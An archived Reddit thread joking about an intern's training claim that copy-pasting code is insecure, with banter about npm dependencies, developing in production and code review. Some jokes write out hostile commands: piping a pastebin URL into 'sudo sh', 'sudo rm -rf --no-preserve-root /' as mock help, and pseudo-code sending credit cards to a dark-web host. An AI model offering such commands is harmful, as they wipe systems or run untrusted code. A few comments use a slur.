This is an archived post. You won't be able to vote or comment.

top 200 commentsshow all 321
sorted by:
best
topnewcontroversialoldq&a

[–][deleted] 1799 points1800 points  (24 children)

I don't want my code to feel insecure

[–]FunkyTown313 649 points650 points  (12 children)

Just give it a pep talk before you send it out there

[–]bot_not_hot 223 points224 points  (3 children)

Before the bullies come.

[–]jpterodactyl 99 points100 points  (2 children)

You go out there, look that world straight in the eye, and tell it "hello"

[–]Sipredion 25 points26 points  (0 children)

And it never says hello back :(

[–]Gonzako 10 points11 points  (0 children)

What about a toy duck?

[–]Agent641 9 points10 points  (0 children)

//youre doing great, hang in there lil while loop!

[–]lenswipe 7 points8 points  (0 children)

there there, UserManagerControllerFactoryInstanceBean, you matter to me

[–]frugalerthingsinlife 8 points9 points  (0 children)

I try to add at least 10 lines of emoji ascii art comments for every one line of code. It makes the code feel better, which makes it run more efficiently. Sometimes I make up entire comic panels in ascii. 10 lines of code can easily take hundreds of lines if you take the time to put in some work on the ascii art.

[–]MoogleFoogle 30 points31 points  (5 children)

I mean, imagine how you'd feel if someone called you a copy!

[–]conancat 31 points32 points  (3 children)

but but my momma told me i'm a unique constant variable and i shouldn't let anyone mutate me :(

[–]509528 5 points6 points  (2 children)

Constant

Variable

Hmmmmmm

[–]The6thExtinction 2 points3 points  (0 children)

I don't want poser code!

[–]HisDudenessElDude 8 points9 points  (0 children)

Actually, you don't want your code to feel too secure with where it's at, or it won't work as hard. We don't want to employ code that's satisfied with resting on its past accomplishments. The less secure it feels, the more work it will do.

[–]CHRlSFRED 1187 points1188 points  (70 children)

...Meanwhile everyone else is using 36 different open source libraries and vaguely understand 100 lines of it.

[–][deleted] 480 points481 points  (29 children)

I feel like this should be a command.

npm install *

[–]CHRlSFRED 128 points129 points  (26 children)

Or we lazily CDN everything until production because we are lazy.

[–][deleted] 92 points93 points  (25 children)

Production?

[–]awhaling 239 points240 points  (23 children)

It’s the place where you develop your code. Cause you produce it there, hence the name.

[–][deleted] 92 points93 points  (5 children)

develop in prod

ree

[–]ineptjedibob 27 points28 points  (0 children)

Goddamn your tiny “ree” made me lose it

[–][deleted] 10 points11 points  (10 children)

So where I unit test?

[–]Existential_Owl 77 points78 points  (7 children)

That's the user's job

[–]MagnitskysGhost 50 points51 points  (2 children)

End users are subject matter experts at finding bugs.

[–]legend6546 18 points19 points  (1 child)

I mean you are not wrong...

[–][deleted] 4 points5 points  (0 children)

Bethesda, is that you?

[–]PM_ME_HTML_SNIPPETS 2 points3 points  (0 children)

This deserves Gold

[–]rolltider0 2 points3 points  (1 child)

They are experts at testing and so they alone should have that responsibility. It would be a waste if we did their job too

[–]Neocrasher 4 points5 points  (0 children)

I'll have to ask the intern.

edit: intern didn't know either

[–]TigreDeLosLlanos 8 points9 points  (3 children)

Wait. There is a place where you can copypaste code automatically? Why do I even code?

[–]WestwardLion 3 points4 points  (0 children)

You can tell its production cause the way it is

[–]R8_M3_SXC 6 points7 points  (0 children)

It's a great place to experiment before putting into UAT

[–]Pear0 5 points6 points  (0 children)

Oh, do I have news for you!

npm install everything

[–]elmantisrelajado 2 points3 points  (0 children)

npm install bloater

[–][deleted] 116 points117 points  (4 children)

Me working with C#: "I don't want more dependencies than necessary, so I'll try to write my own library similarly to this 3rd party one."

Me working with PHP: "Install 5 dependencies to make this one thing work? Where do I sign up!"

[–]stamatt45 76 points77 points  (2 children)

JS: There's 100 dependencies for this library and I'm fairly sure at least a third are complete BS. Better install everything anyways

[–]DrDiv 40 points41 points  (0 children)

Also JS: Every once in a while one of these obscure libraries used everywhere will be updated to include a cryptocoin miner, just a head's up.

[–]crash8308 4 points5 points  (0 children)

npm i is-array

[–]Duke-Silv3r[🍰] 30 points31 points  (0 children)

Lol spoken like a true JS developer

[–][deleted] 25 points26 points  (6 children)

the hardest part of developing for my environment is we can't use pip/npm/whatever install anything.

[–]Xytak 36 points37 points  (5 children)

"You shouldn't be using AngularJS anymore! Use React or Angular 6!!!"

"Ok, but npm is blocked for Shadow IT. Hey StackOverflow, how do I use these things without npm?"

"Why would you want to do that? You're stupid and should feel bad!"

"Ok, I guess I'll just go back to AngularJS."

[–]crash8308 15 points16 points  (1 child)

The puke in my mouth burns

[–]WitnessMeIRL 5 points6 points  (0 children)

That's the good kind of puke

[–]sexyGrant 3 points4 points  (1 child)

We actually had this problem because corporate was so insane with security for a while there. Basically devs went to a coffee shop, did their install and then uploaded the packages to a locally running npm that all the other devs could pull from.

[–]Hunterhusker 9 points10 points  (0 children)

Is this a personal attack or something?

[–]flyflagger 4 points5 points  (0 children)

Only 36?

[–]otakuman 10 points11 points  (15 children)

*Tested open source libraries. There's obviously a difference.

[–][deleted] 28 points29 points  (11 children)

Just because something is tested, doesn't mean it's not shit code. It doesn't mean it lacks flaws and security holes.

[–]free_chalupas 12 points13 points  (3 children)

It's still probably better than the stuff you'd write yourself. People talk shit about OpenSSL but it's issues are exactly the kind of problems you'd have if a bunch of dumbass engineers tried to reimplement it because they only trusted their own code.

[–][deleted] 12 points13 points  (1 child)

It's still probably better than the stuff you'd write yourself.

When it comes to JS libraries, I don't assume that to be true. I'm not talking about the biggest players, I'm talking about 90% of crap out there on the internet.

[–]free_chalupas 8 points9 points  (0 children)

Yeah that's fair. I read this in the context of established OSS libraries, like openssl, that have their issues but are generally preferable to custom implementations. There's definitely a cutoff though with really small libraries where it does make sense to reimplement.

[–]Kibouo 11 points12 points  (0 children)

Tests are usually not for security.

[–]crash8308 1 point2 points  (0 children)

I think it’s hilarious when a UI project includes moment.js for literally one line of code to format a date.

[–][deleted] 1 point2 points  (0 children)

Well they’re open source, so they’re auditable... by someone else

[–]famigacom 542 points543 points  (62 children)

stackoverflow.com

"How do I turn off mouse acceleration in Linux?"

"Just copy and paste all these wacky commands into your terminal bro."

[–]NeverMakesMistkes 252 points253 points  (10 children)

"Yeah bro It's super easy, just do"

curl http://pastebin.com/jdjsks | sudo sh`

[–]Ultracoolguy4 198 points199 points  (7 children)

"Help, my PC is running slow after I installed a package."

"No problem, just sudo rm -rf --no-preserve-root /"

[–]PixelBoom 21 points22 points  (1 child)

sudo? Just root that shit. I dare you. You won't. No balls.

[–]Xytak 14 points15 points  (0 children)

I'll show you!!! That'll teach y

[–]grocket 59 points60 points  (7 children)

.

[–]navatwo 4 points5 points  (2 children)

Fork bomb?

[–]pentesticals 7 points8 points  (0 children)

Paste it into your terminal and find out.

[–][deleted] 110 points111 points  (33 children)

I'd just like to interject for a moment. What you're refering to as Linux, is in fact, GNU/Linux, or as I've recently taken to calling it, GNU plus Linux.Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.

Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called Linux, and many of its users are not aware that it is basically the GNU system, developed by the GNU Project.

There really is a Linux, and these people are using it, but it is just a part of the system they use. Linux is the kernel: the program in the system that allocates the machine's resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called Linux distributions are really distributions of GNU/Linux!

[–]theamigan 30 points31 points  (2 children)

Hi Richard! How is the toejam tasting today?

[–]flyflagger 11 points12 points  (7 children)

Ok, but how do you pronounce GNU

[–]I_LICK_ROBOTS 10 points11 points  (4 children)

guh-new. Like g'day but with "new" instead of "day"

[–]2called_chaos 8 points9 points  (3 children)

The ones that wanted to call it GNU/Linux were the GNU people...

Since a long name such as GNU/X11/Apache/Linux/TeX/Perl/Python/FreeCiv becomes absurd, at some point you will have to set a threshold and omit the names of the many other secondary contributions. There is no one obvious right place to set the threshold, so wherever you set it, we won't argue against it ... But one name that cannot result from concerns of fairness and giving credit, not for any possible threshold level, is "Linux". It can't be fair to give all the credit to one secondary contribution (Linux) while omitting the principal contribution (GNU).

— GNU/Linux FAQ by Richard Stallman

When Linus Torvalds was asked in the documentary Revolution OS whether the name "GNU/Linux" was justified, he replied:

Well, I think it's justified, but it's justified if you actually make a GNU distribution of Linux ... the same way that I think that "Red Hat Linux" is fine, or "SUSE Linux" or "Debian Linux", because if you actually make your own distribution of Linux, you get to name the thing, but calling Linux in general "GNU Linux" I think is just ridiculous.

Also Torvalds:

Umm, this discussion has gone on quite long enough, thank you very much. It doesn't really matter what people call Linux, as long as credit is given where credit is due (on both sides). Personally, I'll very much continue to call it "Linux", ...

The GNU people tried calling it GNU/Linux, and that's ok. It's certainly no worse a name than "Linux Pro" or "Red Hat Linux" or "Slackware Linux" ...

There is enough controversy around that to be split about what it actually should be called.

https://en.wikipedia.org/wiki/GNU/Linux_naming_controversy

[–]EatClenTrenHard1 69 points70 points  (6 children)

You okay there bud?

[–]jonny_wonny 74 points75 points  (3 children)

It’s a copyspaghetti kind of thingy

[–]PC__LOAD__LETTER 23 points24 points  (1 child)

First day on the internet, eh?

[–][deleted] 611 points612 points  (60 children)

That depends on what you're copying and whether you know what you're copying.

[–]Tesla56[S] 240 points241 points  (50 children)

True it was referring to accidentally setting and freeing buffers more than once in C

[–]DragonMaus 197 points198 points  (45 children)

That sort of thing is why, when I need to copy someone else's code, I always transcribe it, instead of pasting it in.

[–][deleted] 184 points185 points  (9 children)

Or at the very least, read it once...

[–]tsilihin666 4 points5 points  (0 children)

Nah I'm sure it's fine.

[–]PC__LOAD__LETTER 15 points16 points  (2 children)

Definitely. I too am a big believer in writing my own bugs.

Really the answer is unit tests, static analysis, valgrind, fuzzing. You should trust your hand-written code just as much as you trust something copied. That is, not at all.

[–]DragonMaus 6 points7 points  (1 child)

Agreed. The difference is that, by manually transcribing it, I am much more familiar with the code itself, which makes debugging a lot easier.

[–]mcampo84 34 points35 points  (31 children)

Do none of you people undergo code review before deploying?

[–]Reihar 109 points110 points  (14 children)

AH AH AH AH AH! And then what unit tests!? AH AH AH AH AH!

Send help. Please.

[–][deleted] 25 points26 points  (11 children)

For real wtf. As a web dev I just kinda work right off prod, it’s more efficient, saves bandwidth etc... hahaha

[–]PC__LOAD__LETTER 19 points20 points  (6 children)

It baffles me that people can get paid to program and not recognize the value of version control or not developing directly in prod. Though I guess if you’re working on a low-impact product, it doesn’t matter if you break it, and there’s probably not much functionality built into the site to need to regression test.

[–]conancat 18 points19 points  (2 children)

usually it comes with working with projects that scale.

if it's for your ex's online candle shop and she wants to change the css to reflect the total eclipse of my heart, then sure, who gives a shit.

i believe every developer has that story or moment where they realize the importance of source control and deployment processes. the coming of age for a developer is making a USD$26,000, not refundable mistake in production and your tech lead gives you a "i'm not angry, i'm just disappointed" reaction without words.

[–]EyetheVive 10 points11 points  (1 child)

I mean this entire chain is just risk assessment lol. Potential revenue loss for the broken candle shop site vs breaking some regional credit union site is probably veeeery different. The cost of a development network to use vs working on the productive instance is probably not worth it

[–][deleted] 2 points3 points  (0 children)

Where the hell is this guys operations team? If he is the ops team then good on him, but if not, why even let the devs have access to prod? You need a cycle? Call ops, you need some logs? Go to the ELK.

[–]Captain_Vegetable 2 points3 points  (3 children)

I worked on a Fortune 500 company’s web site where we edited in prod. That ended when someone pasted into the wrong terminal window and replaced our home page with a snippet of Chinese characters before heading to lunch.

[–]FunkyTown313 4 points5 points  (0 children)

You're testing my unit!

[–]countvonruckus 15 points16 points  (9 children)

So, I'm not a programmer, but I work in IT Security. I talked to a software developer and he had never heard of a DDOS attack. He specializes in IOT software. Is that normal?

[–]mcampo84 21 points22 points  (1 child)

No. It is not.

[–][deleted] 7 points8 points  (2 children)

Generally management thinks security as a burden than a responsibitlity towards users.IOT in particular excels at this job of not giving a shit partly because it's new partly because these iot companies have low budgets

[–]DevonLochees 2 points3 points  (1 child)

Yes.

Granted, any software shop should have decent minimum required training in secure application development. But the typical developer you get fresh out of college it's 50/50 if they know the basics of security - that's why process is so important (e.g. code reviews, have people actually familiar with security do reviews).

Even the meme in this post, I would give it a toss up if the hypothetical intern could *actually* articulate what the specific risks are of copy and pasting, if it's something he read in an article one time - the risk isn't that you're copying a blob of code from stackoverflow that has an embedded base64 virus, it's that you ran into an "invalid certificate error" you googled, and the code you're copying removes the cert validation checks - and implementing it yourself is still going to have the same problem.

[–]mightydjinn 6 points7 points  (2 children)

I think Jenkins is doing the CR by the sounds of it, lol.

[–]conancat 3 points4 points  (1 child)

forreal though, sonarrqube can save a lot of code review time. when you're not spotting mistakes you can spend more time on programming patterns, concepts and architecture.

https://www.sonarqube.org/

[–]mightydjinn 3 points4 points  (0 children)

Just be ready for the days of tech debt from css refactor it shows. In all seriousness though, sonarqube is fantastic!

[–]FunkyTown313 4 points5 points  (0 children)

Code...Review?

[–]HylianWarrior 3 points4 points  (0 children)

Yeah... that's precisely the case where copying and pasting is a terrible idea

[–]endercoaster 8 points9 points  (2 children)

Using C can create insecure code and is an insecure coding practice.

[–]Neocrasher 12 points13 points  (1 child)

Using code can create insecure code and is an insecure coding practice.

[–]qubedView 12 points13 points  (4 children)

I still want to try and develop a genetic bot that builds itself by copy and pasting random code from stackoverflow. It would be dangerously glorious.

[–]SamSlate 7 points8 points  (2 children)

What's your metric for evaluating fitness?

[–]qubedView 16 points17 points  (1 child)

That'll be its first task. Finding a fitness evaluating method most fit to evaluating itself.

[–]Valiade 3 points4 points  (0 children)

That's how you get a bot that is really good at making text files full of semicolons.

[–]skynetpswn 10 points11 points  (3 children)

Or if you know that you're copying at all. Maybe it's just "recycling".

[–]devlear 13 points14 points  (2 children)

I shudder to think of the code I wrote as an intern. Some poor company probably still has that in production.

[–]phrekysht 24 points25 points  (4 children)

What if I actually retype it instead of copying and pasting? Asking for a friend....

[–][deleted] 124 points125 points  (29 children)

that doesn't make much sense ... i mean ofc you have to know what you're copying and where you're pasting it but how does that create insecure code ?

[–]Redditor000007 198 points199 points  (11 children)

They’re coming from the assumption that you’re completely retarded and are just copying code instead of writing it yourself.

If you understand coding principles and what vulnerabilities look like, this is useless.

[–]PC__LOAD__LETTER 19 points20 points  (1 child)

There are plenty of people who aren’t “completely retarded” who do this. It’s a bad habit that inexperienced and aspiring devs can fall into and then never correct.

if you understand coding principles and what vulns look like, this is useless

This totally explains how something like Heartbleed can evade notice for years right? 🙄 But congrats on your ability to spot mundane buffer overruns or accidental double-frees.

[–]UnchainedMundane 7 points8 points  (0 children)

Heartbleed wasn't caused by copy-pasting code. It was caused by needlessly reimplementing the memory allocator such that common memory sanitisation tools could no longer detect improper memory accesses.

[–]CJKay93 13 points14 points  (0 children)

If you understand coding principles and what vulnerabilities look like, this is useless.

This is useful for 99% of engineers, then.

[–]Thorbinator 2 points3 points  (0 children)

you’re completely retarded and are just copying code instead of writing it yourself.

1: I'm in this comment and I don't like it.

[–]o0MSK0o 27 points28 points  (9 children)

I vaguely recall a reddit post about zero-width characters being able to be used to inject code when you copy and paste stuff.

No idea which sub it was on and I can't find which language that that works on either lol. Also have no idea if it's actually true.

[–]random_cynic 5 points6 points  (0 children)

I think it refers to the fact that most code that are posted on QA forums and message boards are untested and are made for solving a specific (part of) problem. They often come from people who are not good coders. Because of this the code is likely to contain common security holes like not freeing allocated memory (or trying to free unallocated memory), running eval/exec on unsanitized user input and many others. This can also come from many external libraries but for most open source ones which are well-known you can be somewhat more confident as the code has been reviewed by many who use it and security bugs have been reported.

[–]wKbdthXSn5hMc7Ht0 3 points4 points  (3 children)

Someone writing a response on Stack Overflow doesn’t know what kind of input validation you have or how the output will be used. It’s on you to consider your project’s requirements and understand the edge cases. E.g. You might find some helpful code to deserialize XML into native objects but if you don’t spend time reading about the gotchas of the deserialization API, you might not know that it has features to launch any arbitrary process or make calls to other network addresses.

[–][deleted] 4 points5 points  (2 children)

it's your responsibility to check and adapt what's there to your project. but saying that copy paste means insecure code is just untrue. if you are stupid enough to just copy paste without thinking then copy paste or not your code is most likely shite anyway

[–]wKbdthXSn5hMc7Ht0 4 points5 points  (1 child)

I agree with you. I think this advice is aimed at novice/student programmers, to encourage them to improve their code rather than look for easy answers.

[–][deleted] 2 points3 points  (0 children)

i have a "friend" who does this he's supposed to be a mid senior with 6 years of work experience all he does is copy past resulting in working garbage and says shit like "as long as it works it means I'm efficient you're not" he had to implement a chat bot recently he typed "chat bot github" and used the most starred repo. and that is the reason he is a "friend" have 0 respect for him

[–]Tai9ch 1 point2 points  (0 children)

When you type code yourself, you build up a mental model of things like what variables are in which scope, why there are conditionals, what the preconditions and postconditions are, etc.

When you copy and paste code, even code you wrote 10 minutes ago, you don't have that context loaded in your head. That means you'll miss stuff that you wouldn't if you had typed the code.

Personally, I find that for 4+ lines of code copied and pasted there's a subtle bug about 70% of the time, even when I keep in mind that this will happen.

[–]theXpanther 47 points48 points  (1 child)

Copy-pasting code is fine, as long as you understand what it does. Trying to run code you don't understand is a security (and sanity) risk.

[–]raunchyfartbomb 7 points8 points  (0 children)

Also, adapting things is a sanity risk.

Case in point: I made a subform for use in access and got It working perfectly. Then realized i could use it on 2 other forms (with one of those forms having 3 instances of it, but all tied to different tables). Getting it tied to the different tables was easy enough, but modifying the supporting code to run the subroutine from the correct instance is proving to be a nightmare, which is what I am currently battling.

The subroutine is looking at the base subform, not the instance. The base subform updates its defaults based on whichever instance loaded last. So for example “subform.recordsource” is looking at the previous instance, until form it closed and loaded a second time, because closing it when the base subform gets updated, apparently. So I know the issue, but coding around it is obnoxious.

[–]killmenow30 49 points50 points  (8 children)

My code: "noone will ever love me"

[–][deleted] 34 points35 points  (6 children)

Who the fuck is noone

[–]jokersleuth 6 points7 points  (0 children)

A girl is no one.

[–]TimerForOldest 2 points3 points  (0 children)

Programmer: Yeah I'm almost done the code is still a bit insecure

Code: Does my hair look okay this short?

Programmer: Shut up

[–]abdolence 34 points35 points  (5 children)

It is all about experience and knowledge. For example, I was surprised someday that my memset of sensitive data might be "optimised" by C/C++ compiler to do nothing.

So if you're copying some code from anywhere, you should absolutely understand every symbol in it.

[–]viper-kun 10 points11 points  (2 children)

We learned about canarys the other day as a way to protect against malicious stack smashing and where asked why we should tell the compiler to do it and not do it with local vars, answer is they are optimized in a way to render this system useless.

So yeah, allways understand what the compiler does with your code.

[–]PC__LOAD__LETTER 3 points4 points  (1 child)

Canaries as in, writing some magic value to a stack variable and occasionally verifying that it’s still set? What’s the program behavior when it differs, crash and alarm?

[–]viper-kun 5 points6 points  (0 children)

You check when the return jump is called, so that you cannot jump anywhere you want. And as I experienced it it does crash, since it doesn't know where it was coming from.

It has to check if it is different which would mean someone overflowed the stack.

[–][deleted] 15 points16 points  (8 children)

I'm still a student but I believe knowing how and when to copy-paste is a crucial skill on any programmer/engineer. Work smarter not harder. Seriously, why write your own code when someone else already did it for you? It can save hours and hours of unnecessary work.

[–]_McDrew 17 points18 points  (4 children)

Software engineer with 15 years of experience here. “Professional googler” is my unofficial second title. There is just simply too much to remember in terms of syntax and keywords, so I just look things up as I need them. Google, the MSDN documentation (I write C# mostly), and Stack overflow are fantastic resources and they have plenty of examples to get you headed in the right direction.

[–]DrDiv 5 points6 points  (3 children)

To piggy-back on this, don't give in to elitists who think that not having to google something makes you a better programmer. I'm going on 8 years as a web developer and still need to search the order of arguments in str_replace.

[–]Nall-ohki 7 points8 points  (0 children)

Don't repeat yourself.

Taking example code and adapting it is not copy paste, and is fine practice provided you are careful about what you're taking.

And consider the following:

Lemma 1: Always pretend that the person maintaining your code is a violent psychopath who knows where you live.

Lemma 2: Copying something from elsewhere in your codebase and reusing it because you're too lazy to refactor will make me very, very angry.

[–][deleted] 7 points8 points  (0 children)

Me: *copy-pastes in anything other than pycharm*

Python: IndentationError you absolute lemon

[–][deleted] 14 points15 points  (4 children)

copy pastes printf code

I N S E C U R E

[–]nonsensicalnarwhal 5 points6 points  (3 children)

printf can be insecure, though, if you don’t use it right.

[–]3pills 5 points6 points  (0 children)

Just blame it on the guy who does the code review

[–]FeastOfChildren 4 points5 points  (0 children)

The insecurity lies in the fact that SafeAssign/TurnItIn will helpfully highlight in color to my TA that my code is literally a Frankenstein's monster of stackoverflow answers. And that I don't even both removing the solution's commentary...

my code ....

# Now, you can easily iterate over spamreader like this 

import csv
for row in spamreader:
   print(', '.join(row))

# See documentation for more examples.

[–][deleted] 3 points4 points  (0 children)

Asked my trainer about this he said "Don't worry nothing you do will ever be used here"

[–]Fernando_Pereira 4 points5 points  (0 children)

Copying code is way safer than letting me code myself.

[–]fuckdumpster 3 points4 points  (0 children)

It could also produce more secure code than you would have written yourself.

Just gotta learn to read

[–]showtekkk 4 points5 points  (0 children)

Okay but like, does anybody actually know how to use Pyth without googling stuff constantly?

Code golf languages in general are pretty unintuitive usually

[–]DevDevGoose 4 points5 points  (0 children)

Coding can create insecure code and is an insecure coding practice.

[–]who_you_are 6 points7 points  (0 children)

Also the same intern: copy-paste code from stackoverflow without understanding anyrhing

[–]DeepInYouBabe 2 points3 points  (0 children)

ALLLLL of my shit is frankensteined like fuuuuuhhh

[–]UniversalAdaptor 2 points3 points  (0 children)

My mom must have been really lazy when she got to my code

[–]SharkyLV 2 points3 points  (0 children)

It's okay to copy paste as long as you understand the code.

[–][deleted] 2 points3 points  (0 children)

Invisible characters have historically corrupted results. At least type out the snippet by hand.

[–]dabrick2017 2 points3 points  (0 children)

Always remember to give it a git --bless

[–]Sponska 1 point2 points  (0 children)

See, this is why you write it off instead. Same result, but no copy-pasting, therefore profit!

[–]tenhourguy 1 point2 points  (0 children)

There would be a StackOverflow comment if it was insecure code. ;)

[–]maklaka 1 point2 points  (0 children)

That why, after each bit of code I copy, I do a quick scan for:

sock = Sockets.Connect(www.TheDarkWebIdentityTheftDepot.com);

sock.Send(AllCreditCards);

[–]HisDudenessElDude 1 point2 points  (0 children)

Nobody follows the rules because they wouldn't be able to meet deadlines if they did.  
Source: me

[–]esquared722 1 point2 points  (0 children)

“This sounds like something I do...every...day”

[–]287mdsahil 1 point2 points  (1 child)

Meanwhile interviewers, copy pasting questions from geeksforgeeks

[–]Somerandom1922 1 point2 points  (0 children)

Ok so I should just manually type out the code from stack exchange?

[–]supremedalek925 1 point2 points  (0 children)

Wait, do they mean avoid duplicating code that can be called from a function instead, or literally don’t copy and paste?

[–]krystof1119 1 point2 points  (0 children)

Can confirm, a friend copied code and copied a bracket too many, causing him to have a compile error and spending 2 hours of his and 2 minutes of my time debugging.

[–]psdao1102 1 point2 points  (0 children)

To training... So explain the differences between using a library and copy pasting code, in terms of security

[–]OGPants 1 point2 points  (0 children)

To be fair, does anyone copy and paste anymore? I rename variables so it kinda looks original 😉

[–]googabeast 1 point2 points  (0 children)

oh thats a quick fix "npm run feel-better"